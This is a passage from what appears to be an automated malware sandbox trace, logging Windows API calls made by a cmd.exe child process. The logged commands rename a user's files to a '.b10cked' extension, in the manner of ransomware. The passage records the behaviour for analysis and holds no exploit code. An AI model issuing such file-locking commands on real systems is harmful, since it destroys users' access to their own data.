State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0194.393] GetConsoleOutputCP () returned 0x1b5 [0194.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.405] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.406] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.406] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0194.406] GetEnvironmentStringsW () returned 0x3c0150* [0194.406] FreeEnvironmentStringsW (penv=0x3c0150) returned 1 [0194.406] GetEnvironmentStringsW () returned 0x3c0150* [0194.407] FreeEnvironmentStringsW (penv=0x3c0150) returned 1 [0194.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed1c | out: phkResult=0x1eed1c*=0x40) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegCloseKey (hKey=0x40) returned 0x0 [0194.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed1c | out: phkResult=0x1eed1c*=0x40) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x40, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x1, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x0, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x4, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x4) returned 0x0 [0194.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed24, lpData=0x1eed28, lpcbData=0x1eed20*=0x1000 | out: lpType=0x1eed24*=0x0, lpData=0x1eed28*=0x9, lpcbData=0x1eed20*=0x1000) returned 0x2 [0194.407] RegCloseKey (hKey=0x40) returned 0x0 [0194.407] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639c [0194.407] srand (_Seed=0x5b88639c) [0194.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" [0194.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked\"" [0194.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3c18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0194.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0194.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0194.408] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0194.408] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0194.408] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0194.408] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0194.408] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0194.408] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0194.408] GetEnvironmentStringsW () returned 0x3c22a0* [0194.408] FreeEnvironmentStringsW (penv=0x3c22a0) returned 1 [0194.408] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.408] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0194.408] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0194.409] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0194.409] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0194.409] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0194.409] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0194.409] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0194.409] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efae8, lpFilePart=0x1efae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efae4*="Desktop") returned 0x18 [0194.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: hFindFile=0x3bffe0) returned 1 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: hFindFile=0x3bffe0) returned 1 [0194.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef864 | out: lpFindFileData=0x1ef864) returned 0x3bffe0 [0194.409] FindClose (in: hFindFile=0x3bffe0 | out: hFindFile=0x3bffe0) returned 1 [0194.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0194.410] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0194.410] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0194.410] GetEnvironmentStringsW () returned 0x3c2ac0* [0194.410] FreeEnvironmentStringsW (penv=0x3c2ac0) returned 1 [0194.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.410] GetConsoleOutputCP () returned 0x1b5 [0194.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.410] GetUserDefaultLCID () returned 0x409 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efc28, cchData=128 | out: lpLCData="0") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efc28, cchData=128 | out: lpLCData="0") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efc28, cchData=128 | out: lpLCData="1") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0194.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0194.411] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0194.412] GetConsoleTitleW (in: lpConsoleTitle=0x3b08b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0194.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0194.413] _wcsicmp (_String1="move", _String2=")") returned 68 [0194.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0194.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0194.419] _wcsicmp (_String1="IF", _String2="move") returned -4 [0194.419] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0194.419] _wcsicmp (_String1="REM", _String2="move") returned 5 [0194.419] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0194.421] GetConsoleTitleW (in: lpConsoleTitle=0x1ef920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0194.421] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CD") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="REN") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="SET") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="MD") returned 11 [0194.422] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0194.422] _wcsicmp (_String1="move", _String2="RD") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0194.422] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0194.422] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0194.422] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0194.422] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="VER") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0194.422] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0194.422] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0194.422] _wcsicmp (_String1="move", _String2="START") returned -6 [0194.422] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0194.422] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0194.422] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0194.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0194.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0194.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef6dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef6d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef6d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0194.424] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0194.425] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0194.425] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0194.425] _wcsicmp (_String1="Hx.hxn", _String2=".") returned 58 [0194.425] _wcsicmp (_String1="Hx.hxn", _String2="..") returned 58 [0194.425] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn")) returned 0x2022 [0194.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3c1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0194.425] SetErrorMode (uMode=0x0) returned 0x0 [0194.425] SetErrorMode (uMode=0x1) returned 0x0 [0194.425] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", nBufferLength=0x104, lpBuffer=0x1ef064, lpFilePart=0x1ef04c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", lpFilePart=0x1ef04c*="Hx.hxn") returned 0x21 [0194.425] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2010 [0194.426] _wcsicmp (_String1="Hx.hxn", _String2=".") returned 58 [0194.426] _wcsicmp (_String1="Hx.hxn", _String2="..") returned 58 [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn")) returned 0x2022 [0194.426] SetErrorMode (uMode=0x0) returned 0x0 [0194.426] SetErrorMode (uMode=0x1) returned 0x0 [0194.426] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", nBufferLength=0x104, lpBuffer=0x1ef4e0, lpFilePart=0x1ef278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", lpFilePart=0x1ef278*="Hx.hxn") returned 0x21 [0194.426] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] SetErrorMode (uMode=0x0) returned 0x0 [0194.426] SetErrorMode (uMode=0x1) returned 0x0 [0194.426] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef6e8, lpFilePart=0x1ef278 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked", lpFilePart=0x1ef278*="Hx.hxn.b10cked") returned 0x29 [0194.426] SetErrorMode (uMode=0x0) returned 0x1 [0194.426] SetLastError (dwErrCode=0x0) [0194.426] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx.hxn.b10cked")) returned 0xffffffff [0194.426] GetLastError () returned 0x2 [0194.426] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x1eebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eebf4) returned 0x3c2198 [0194.427] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x1eebf4 | out: lpFindFileData=0x1eebf4) returned 0 [0194.427] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.427] GetLastError () returned 0x12 [0194.427] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x1eebf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eebf4) returned 0x3c2198 [0194.427] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x1eebf4 | out: lpFindFileData=0x1eebf4) returned 0 [0194.427] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.427] GetLastError () returned 0x12 [0194.428] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x3c1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1ac8) returned 0x3c2198 [0194.428] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x3c1ac8 | out: lpFindFileData=0x3c1ac8) returned 0 [0194.428] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.428] GetLastError () returned 0x12 [0194.428] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx.hxn", fInfoLevelId=0x1, lpFindFileData=0x3c1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1ac8) returned 0x3c2198 [0194.428] FindNextFileW (in: hFindFile=0x3c2198, lpFindFileData=0x3c1ac8 | out: lpFindFileData=0x3c1ac8) returned 0 [0194.428] FindClose (in: hFindFile=0x3c2198 | out: hFindFile=0x3c2198) returned 1 [0194.428] GetLastError () returned 0x12 [0194.428] _get_osfhandle (_FileHandle=2) returned 0xb [0194.429] GetFileType (hFile=0xb) returned 0x2 [0194.545] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0194.545] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1eedc4 | out: lpMode=0x1eedc4) returned 1 [0194.545] _get_osfhandle (_FileHandle=2) returned 0xb [0194.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1eedf8 | out: lpConsoleScreenBufferInfo=0x1eedf8) returned 1 [0194.546] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0194.546] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1eee38 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0194.547] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1eee1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1eee1c*=0x2c) returned 1 [0194.547] longjmp () [0194.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0194.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0194.547] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0194.547] _get_osfhandle (_FileHandle=0) returned 0x3 [0194.547] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0194.547] SetConsoleInputExeNameW () returned 0x1 [0194.547] GetConsoleOutputCP () returned 0x1b5 [0194.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0194.547] SetThreadUILanguage (LangId=0x0) returned 0x409 [0194.548] exit (_Code=1) Process: id = "442" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xd40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp\" 